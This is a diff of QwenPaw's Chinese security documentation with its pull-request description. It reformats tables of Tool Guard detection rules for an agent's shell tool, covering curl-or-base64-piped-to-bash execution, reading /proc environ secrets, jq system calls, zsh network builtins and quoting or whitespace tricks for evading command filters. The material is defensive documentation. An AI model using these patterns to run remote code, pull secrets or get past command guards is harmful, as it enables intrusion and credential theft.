-| `TOOL_CMD_UNICODE_WHITESPACE` | HIGH     | NBSP、表意空格等 Unicode 空白                                                          | 解析器与 Bash 对空白处理不一致时的绕过面                                                   |
-| `TOOL_CMD_PROC_ENVIRON`       | HIGH     | `/proc/self/environ`、`/proc/<pid>/environ`                                           | 读取进程环境块(密钥、令牌),常与执行或外泄链配合                                            |
-| `TOOL_CMD_JQ_SYSTEM`          | HIGH     | 含 `system(` 的 `jq`                                                                   | 在 jq 程序中嵌入 Shell 执行                                                                |
-| `TOOL_CMD_JQ_FILE_FLAGS`      | HIGH     | `jq` 的 `-f`/`--from-file`、`--rawfile`、`--slurpfile`、`-L`、`--library-path`         | 任意读文件或加载外部 jq 代码路径                                                           |
-| `TOOL_CMD_ZSH_DANGEROUS`      | HIGH     | `zmodload`、`emulate ... -c`、`sysopen`/`zpty`/`ztcp`、`zf_*`、`fc ... -e` 等          | zsh 内建提供的原始 I/O、网络或执行能力,绕过常见路径型检查                                    |
+| 规则 ID                       | 严重级别 | 检测目标                                                                       | 说明                                                      |
+| ----------------------------- | -------- | ------------------------------------------------------------------------------ | --------------------------------------------------------- |
+| `TOOL_CMD_PIPE_TO_SHELL`      | CRITICAL | `curl/wget ... \| bash/sh` 模式                                                | 下载并立即执行远程脚本                                    |
+| `TOOL_CMD_OBFUSCATED_EXEC`    | HIGH     | `base64 -d \| bash` 模式                                                       | 执行 base64 编码的命令                                    |
+| `TOOL_CMD_IFS_INJECTION`      | HIGH     | `$IFS`、`${...IFS...}`                                                         | 利用字段分隔符拆分 token,绕过简单词边界类检测             |
+| `TOOL_CMD_CONTROL_CHARS`      | CRITICAL | 不可见控制字符(含 NUL 等)                                                      | 可能在简单扫描下隐藏元字符                                |
+| `TOOL_CMD_UNICODE_WHITESPACE` | HIGH     | NBSP、表意空格等 Unicode 空白                                                  | 解析器与 Bash 对空白处理不一致时的绕过面                  |
+| `TOOL_CMD_PROC_ENVIRON`       | HIGH     | `/proc/self/environ`、`/proc/<pid>/environ`                                    | 读取进程环境块(密钥、令牌),常与执行或外泄链配合           |
+| `TOOL_CMD_JQ_SYSTEM`          | HIGH     | 含 `system(` 的 `jq`                                                           | 在 jq 程序中嵌入 Shell 执行                               |
+| `TOOL_CMD_JQ_FILE_FLAGS`      | HIGH     | `jq` 的 `-f`/`--from-file`、`--rawfile`、`--slurpfile`、`-L`、`--library-path` | 任意读文件或加载外部 jq 代码路径                          |
+| `TOOL_CMD_ZSH_DANGEROUS`      | HIGH     | `zmodload`、`emulate ... -c`、`sysopen`/`zpty`/`ztcp`、`zf_*`、`fc ... -e` 等  | zsh 内建提供的原始 I/O、网络或执行能力,绕过常见路径型检查 |
 
 **权限提升（CRITICAL/HIGH）：**
 
@@ -213,15 +213,15 @@ QwenPaw 的安全系统由三个核心安全层组成:
 
 引擎还会对 `execute_shell_command` 运行 **`ShellEvasionGuardian`**。它维护引号状态,弥补仅靠行级或纯正则易漏的混淆(例如单引号外的命令替换、`` ` ``、`$()`、Zsh 形式、`$'...'`/`$"..."` 技巧、反斜杠转义的空白或 shell 操作符——对常见 `find ... -exec ... {} \;` 有例外——可能拆分命令的裸换行或 `\r` 且跳过 heredoc、`#` 注释与引号状态不同步、引号内换行后接看似注释的行等)。上报的规则 ID(严重级别均为 **HIGH**):
 
-| 规则 ID                               | 说明                                                         |
-| ------------------------------------- | ------------------------------------------------------------ |
-| `SHELL_EVASION_COMMAND_SUBSTITUTION`  | 单引号 `'`...`'` 外的反引号或命令/进程替换类写法             |
-| `SHELL_EVASION_OBFUSCATED_FLAGS`      | ANSI-C/区域化引号、空引号标志位技巧或引号包裹的标志片段      |
-| `SHELL_EVASION_BACKSLASH_WHITESPACE`  | 引号外对空格或制表符的反斜杠转义                           |
-| `SHELL_EVASION_BACKSLASH_OPERATOR`    | 引号外对 `; \| & < >` 前加反斜杠                           |
-| `SHELL_EVASION_NEWLINE`               | 回车或未在引号内且后跟更多命令文本的换行                   |
-| `SHELL_EVASION_COMMENT_QUOTE_DESYNC`  | 未在引号内的 `#` 注释行中出现引号字符,干扰引号跟踪         |
-| `SHELL_EVASION_QUOTED_NEWLINE`        | 引号内换行且后续片段形如 `#` 注释行                        |
+| 规则 ID                              | 说明                                                    |
+| ------------------------------------ | ------------------------------------------------------- |
+| `SHELL_EVASION_COMMAND_SUBSTITUTION` | 单引号 `'`...`'` 外的反引号或命令/进程替换类写法        |
+| `SHELL_EVASION_OBFUSCATED_FLAGS`     | ANSI-C/区域化引号、空引号标志位技巧或引号包裹的标志片段 |
+| `SHELL_EVASION_BACKSLASH_WHITESPACE` | 引号外对空格或制表符的反斜杠转义                        |
+| `SHELL_EVASION_BACKSLASH_OPERATOR`   | 引号外对 `; \| & < >` 前加反斜杠                        |
+| `SHELL_EVASION_NEWLINE`              | 回车或未在引号内且后跟更多命令文本的换行                |
+| `SHELL_EVASION_COMMENT_QUOTE_DESYNC` | 未在引号内的 `#` 注释行中出现引号字符,干扰引号跟踪      |
+| `SHELL_EVASION_QUOTED_NEWLINE`       | 引号内换行且后续片段形如 `#` 注释行                     |
 
 **配置说明:** `config.json` 中的 `disabled_rules` 仅作用于 YAML 规则 ID(一般为 `TOOL_CMD_*`),**不会**关闭 `SHELL_EVASION_*`;关闭工具守卫会一并停用所有守卫(含本守卫)。
 


### PR DESCRIPTION
## Description

Aligns the public security documentation (English and Chinese) with how Tool Guard actually works: **YAML regex rules** plus the quote-aware **`ShellEvasionGuardian`** on `execute_shell_command`. Updates the architecture overview, “how it works” bullets, and the built-in rule tables—including **shell obfuscation / evasion** rule IDs (`TOOL_CMD_IFS_INJECTION`, `TOOL_CMD_CONTROL_CHARS`, `TOOL_CMD_UNICODE_WHITESPACE`, `TOOL_CMD_PROC_ENVIRON`, `TOOL_CMD_JQ_*`, `TOOL_CMD_ZSH_DANGEROUS`) and a dedicated **Shell evasion guardian** section documenting `SHELL_EVASION_*` IDs and behavior.

Also **cleans up comments** in `dangerous_shell_commands.yaml` (removes third-party attribution line and `bashSecurity #…` style headers); **no change to rule logic or IDs**.

**Related Issue:** N/A (or replace with `Fixes #…` / `Relates to #…` if you have one)

**Security Considerations:** Documentation-only clarification for operators: `disabled_rules` applies to YAML `TOOL_CMD_*` rules and does **not** disable `SHELL_EVASION_*`; disabling those requires turning off Tool Guard entirely. No new secrets, auth, or env handling in code paths.

## Type of Change

- [ ] Bug fix
- [ ] New feature
- [ ] Breaking change
- [x] Documentation
- [] Refactoring

## Component(s) Affected

- [x] Core / Backend (app, agents, config, providers, utils, local_models) — `dangerous_shell_commands.yaml` comments only
- [ ] Console (frontend web UI)
- [ ] Channels (DingTalk, Feishu, QQ, Discord, iMessage, etc.)
- [ ] Skills
- [ ] CLI
- [x] Documentation (website)
- [ ] Tests
- [ ] CI/CD
- [ ] Scripts / Deploy

## Checklist

- [ ] I ran `pre-commit run --all-files` locally and it passes
- [ ] If pre-commit auto-fixed files, I committed those changes and reran checks
- [ ] I ran tests locally (`pytest` or as relevant) and they pass
- [x] Documentation updated (if needed)
- [ ] Ready for review

### For Channel Changes (DingTalk, Feishu, QQ, Console, etc.)

- [ ] I ran `./scripts/check-channels.sh` (or `./scripts/check-channels.sh --changed`) and it passes
- [ ] **Contract test** exists in `tests/contract/channels/test_<channel>_contract.py` (REQUIRED)
- [ ] Contract test implements `create_instance()` with proper channel initialization
- [ ] All 19 contract verification points pass (see `tests/contract/channels/__init__.py`)
- [ ] **Optional**: Unit tests in `tests/unit/channels/test_<channel>.py` for complex internal logic

## Local Verification Evidence

```bash
pre-commit run --all-files
# paste summary result

pytest
# paste summary result
```

## Additional Notes

- **Files touched:** `website/public/docs/security.en.md`, `website/public/docs/security.zh.md`, `src/qwenpaw/security/tool_guard/rules/dangerous_shell_commands.yaml`.
- **Commits on branch (vs `main`):** `update doc`, several `fix format`.